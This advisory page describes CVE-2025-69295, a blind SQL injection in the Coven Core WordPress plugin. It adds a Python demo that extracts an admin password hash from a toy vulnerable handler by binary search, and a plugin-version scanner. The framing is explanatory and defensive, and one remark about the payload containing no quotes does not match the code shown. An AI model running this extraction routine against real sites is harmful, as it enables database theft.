CVE-2025-69295
Published: 20 February 2026
Summary
CVE-2025-69295 is a critical-severity SQL injection (CWE-89) vulnerability with a CVSS v3.1 base score of 9.3 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks at the 32.6th percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations identified in our analysis are NIST 800-53 RA-5 (Vulnerability Monitoring and Scanning) and SI-10 (Information Input Validation).
Deeper analysis
CVE-2025-69295 is an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that enables blind SQL injection in the TeconceTheme Coven Core (coven-core) WordPress plugin. All versions up to and including 1.3 are affected (the advisory gives no lower bound, hence "from n/a"). The CVE was published on 2026-02-20.
The vulnerability carries a CVSS v3.1 base score of 9.3 (vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L): an unauthenticated remote attacker can exploit it over the network with low attack complexity and no user interaction. Successful exploitation has high confidentiality impact (extraction of database contents), low availability impact, no rated integrity impact, and a scope change, meaning the consequences extend beyond the vulnerable plugin component itself. Because the injection is blind, the application never echoes query results; the attacker instead infers data from true/false or timing differences in the response, one small piece per request, which is slower than in-band injection but fully automatable.
Mitigation details are available in the Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/coven-core/vulnerability/wordpress-coven-core-plugin-1-3-sql-injection-vulnerability?_s_id=cve, which covers the SQL injection in Coven Core 1.3 and earlier.
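To make the "blind" part of the finding concrete, the following added example (not the Coven Core plugin's code, and not taken from the advisory) models the CWE-89 pattern with an in-memory SQLite database standing in for WordPress tables. A hypothetical vulnerable handler splices a request parameter into SQL and returns only found/not-found; a boolean oracle built on that single bit recovers the admin password hash one character at a time. The hardened handler binds the parameter (the equivalent of WordPress's $wpdb->prepare()), and the same extraction routine gets nothing back. Table names, the known published post ID 10 and the placeholder hash value are all constructed assumptions of this scenario.

```python
"""Constructed model of the CWE-89 pattern behind this advisory and the
boolean-based blind extraction it enables. Added example: not the Coven Core
plugin's code. In-memory SQLite tables stand in for wp_posts / wp_users."""
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the user_pass value is a placeholder string."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_posts (ID INTEGER, post_status TEXT)")
    con.executemany("INSERT INTO wp_posts VALUES (?, ?)",
                    [(10, "publish"), (11, "draft")])
    con.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    con.execute("INSERT INTO wp_users VALUES ('admin', '$P$Bsecret')")
    return con


def vulnerable_lookup(con: sqlite3.Connection, post_id: str) -> bool:
    """Hypothetical vulnerable handler: the request parameter is spliced into
    the SQL text (the CWE-89 defect). Only "found / not found" is returned,
    which is exactly what makes the resulting injection *blind*."""
    sql = ("SELECT ID FROM wp_posts WHERE post_status = 'publish' "
           f"AND ID = {post_id}")
    return con.execute(sql).fetchone() is not None


def hardened_lookup(con: sqlite3.Connection, post_id: str) -> bool:
    """Fixed handler: the value is bound as a parameter, so it is only ever
    compared against ID and never parsed as SQL ($wpdb->prepare() equivalent)."""
    sql = "SELECT ID FROM wp_posts WHERE post_status = 'publish' AND ID = ?"
    return con.execute(sql, (post_id,)).fetchone() is not None


def blind_extract(lookup, con: sqlite3.Connection, max_len: int = 64) -> tuple[str, int]:
    """Recover admin's user_pass through a yes/no oracle: every crafted post_id
    asks "is <expr> greater than <threshold>?" and the handler's boolean result
    is the answer. Returns (recovered value, number of requests needed)."""
    queries = 0
    secret_row = "FROM wp_users WHERE user_login = 'admin'"

    def greater_than(expr: str, threshold: int) -> bool:
        nonlocal queries
        queries += 1
        # Post 10 is known to be published, so the AND isolates the injected
        # condition (assumption of this constructed scenario).
        return lookup(con, f"10 AND ({expr} {secret_row}) > {threshold}")

    def binary_search(expr: str, lo: int, hi: int) -> int:
        # Smallest v in [lo, hi] for which "expr > v" is false, i.e. expr's value.
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(expr, mid):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = binary_search("SELECT length(user_pass)", 0, max_len)
    chars = [chr(binary_search(f"SELECT unicode(substr(user_pass, {i}, 1))", 32, 126))
             for i in range(1, length + 1)]
    return "".join(chars), queries


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler:", blind_extract(vulnerable_lookup, db))
    print("hardened handler:  ", blind_extract(hardened_lookup, db))
```

Against the vulnerable handler the routine pulls the full 10-character placeholder with roughly seventy requests (about seven per character, since each binary-search step yields one bit); against the hardened handler the injected text is simply a non-numeric post ID, every oracle question answers "no", and the routine returns an empty string. Note that the fix is parameter binding, not filtering of quote characters: the payload here contains no quotes at all in the injected condition's outer structure.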
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-207935
Vulnerability details
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Coven Core coven-core allows Blind SQL Injection. This issue affects Coven Core: from n/a through <= 1.3.
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Direct, unauthenticated SQL injection in a public-facing WordPress plugin lets a remote attacker exploit the application over the network, which is the definition of T1190.
Mitigating Controls
Mitigating Controls (NIST 800-53 r5)
SI-10 (Information Input Validation) requires that data supplied to the application be checked before use. For database access the effective form of this control is to pass request parameters as bound query arguments (in WordPress, through $wpdb->prepare()) rather than concatenating them into SQL text, so that special characters can never alter the command; this removes the blind injection path in Coven Core.
SI-2 (Flaw Remediation) mandates timely identification, reporting and correction of flaws such as this one: tracking the vendor advisory and updating Coven Core beyond the affected range (through 1.3) once a fixed release is published.
RA-5 (Vulnerability Monitoring and Scanning) covers the scanning that finds affected plugin versions across an estate, so that remediation under SI-2 can be prioritised rather than discovered by the attacker first.
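As an added example of the RA-5 check described above (not from the advisory or the plugin), the following code reads the WordPress plugin header, compares the installed version against the affected range "through 1.3" numerically, and reports installs in range. The sample plugin headers are constructed; the slug coven-core and the bound 1.3 come from the advisory. Numeric comparison matters here: a string comparison would wrongly treat "1.10" as older than "1.3".

```python
"""Added example (not part of the advisory): a minimal RA-5 style check that
reads the WordPress plugin header and decides whether an installed Coven Core
falls in the affected range "through 1.3". Sample headers are constructed."""
from __future__ import annotations

import re

AFFECTED_SLUG = "coven-core"
AFFECTED_THROUGH = "1.3"          # upper bound of the affected range (inclusive)

# WordPress plugin headers are comment lines such as " * Version: 1.3" in the
# plugin's main PHP file.
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def header_version(main_file_text: str) -> str | None:
    """Return the Version: header value, or None if the header is missing."""
    m = VERSION_RE.search(main_file_text)
    return m.group(1) if m else None


def version_tuple(v: str) -> tuple[int, ...]:
    """Numeric dotted-version parse: "1.10" must compare greater than "1.3",
    which a plain string comparison gets wrong. A non-numeric suffix such as
    "-beta" ends the parse (assumption: compare on the numeric base only)."""
    parts: list[int] = []
    for piece in v.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected(installed: str, through: str = AFFECTED_THROUGH) -> bool:
    """True when installed <= through, padding so that "1.3.0" equals "1.3"."""
    a, b = version_tuple(installed), version_tuple(through)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a <= b


def scan(inventory: dict[str, str]) -> list[tuple[str, str]]:
    """inventory maps plugin slug -> main-file text; returns (slug, version)
    for every Coven Core install inside the affected range."""
    findings = []
    for slug, text in inventory.items():
        if slug != AFFECTED_SLUG:
            continue
        ver = header_version(text)
        if ver is None or is_affected(ver):
            # A missing header is reported too: an unknown version is not "safe".
            findings.append((slug, ver or "unknown"))
    return findings


# Constructed sample inventory: one copy of the plugin plus an unrelated plugin.
SAMPLE_INVENTORY = {
    "coven-core": "<?php\n/**\n * Plugin Name: Coven Core\n * Version: 1.3\n */\n",
    "other-plugin": "<?php\n/**\n * Plugin Name: Other\n * Version: 1.2\n */\n",
}

if __name__ == "__main__":
    print(scan(SAMPLE_INVENTORY))
```

In a real estate the inventory would be built from each site's wp-content/plugins directory (or `wp plugin list`), and a positive finding feeds the SI-2 remediation queue. The check deliberately treats a missing or unparseable version header as a finding rather than a pass.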